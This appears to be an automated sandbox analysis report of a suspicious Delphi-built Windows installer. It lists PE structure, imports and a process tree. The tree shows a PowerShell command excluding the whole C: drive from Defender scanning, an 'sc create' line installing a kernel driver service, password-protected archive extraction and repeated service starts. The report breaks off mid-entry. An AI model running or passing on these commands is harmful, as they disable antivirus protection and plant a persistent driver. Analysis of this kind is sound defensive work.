                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F00A8F40873h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F00A8F4755Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F00A8F3CC38h
                            mov edx, dword ptr [004B4200h]

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .rsrc0xcb0000x110000x11000100340e93592f17c49bc1c94c351b59dFalse0.1877154181985294data3.722827410367583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                            RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                            RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                            RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                            RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                            RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                            RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                            RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                            RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                            RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                            RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                            RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                            RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                            RT_STRING0xd8e000x3f8data0.3198818897637795
                            RT_STRING0xd91f80x2dcdata0.36475409836065575
                            RT_STRING0xd94d40x430data0.40578358208955223
                            RT_STRING0xd99040x44cdata0.38636363636363635
                            RT_STRING0xd9d500x2d4data0.39226519337016574
                            RT_STRING0xda0240xb8data0.6467391304347826
                            RT_STRING0xda0dc0x9cdata0.6410256410256411
                            RT_STRING0xda1780x374data0.4230769230769231
                            RT_STRING0xda4ec0x398data0.3358695652173913
                            RT_STRING0xda8840x368data0.3795871559633027
                            RT_STRING0xdabec0x2a4data0.4275147928994083
                            RT_RCDATA0xdae900x10data1.5
                            RT_RCDATA0xdaea00x310data0.6173469387755102
                            RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                            RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                            RT_VERSION0xdb2980x584dataEnglishUnited States0.2769121813031161
                            RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                            Imports

                            DLLImport
                            kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                            comctl32.dllInitCommonControls
                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                            advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                            Exports

                            NameOrdinalAddress
                            __dbk_fcall_wrapper20x40fc10
                            dbkFCallWrapperAddr10x4b063c

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            No network behavior found

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:07:03:07
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
                            Imagebase:0x160000
                            File size:8'648'945 bytes
                            MD5 hash:D4C8420BEA7C19A44AB6AD71FD8DDE34
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:1
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
                            Imagebase:0xa20000
                            File size:3'366'912 bytes
                            MD5 hash:E4680C0AB69900E6A19A0AA38BD54AAD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:3
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:4
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:5
                            Start time:07:03:09
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
                            Imagebase:0x160000
                            File size:8'648'945 bytes
                            MD5 hash:D4C8420BEA7C19A44AB6AD71FD8DDE34
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:6
                            Start time:07:03:10
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
                            Imagebase:0xf00000
                            File size:3'366'912 bytes
                            MD5 hash:E4680C0AB69900E6A19A0AA38BD54AAD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:7
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:8
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:9
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:10
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0xda0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:11
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:12
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0xda0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            General

                            Target ID:13
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            General

                            Target ID:14
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff6ef0c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            General

                            Target ID:15
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:16
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:17
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:18
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:19
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:20
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:21
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:22
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:23
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:24
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:25
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:26
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:27
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:28
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:29
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:30
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6d64d0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:31
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:32
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:33
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:07:03:15
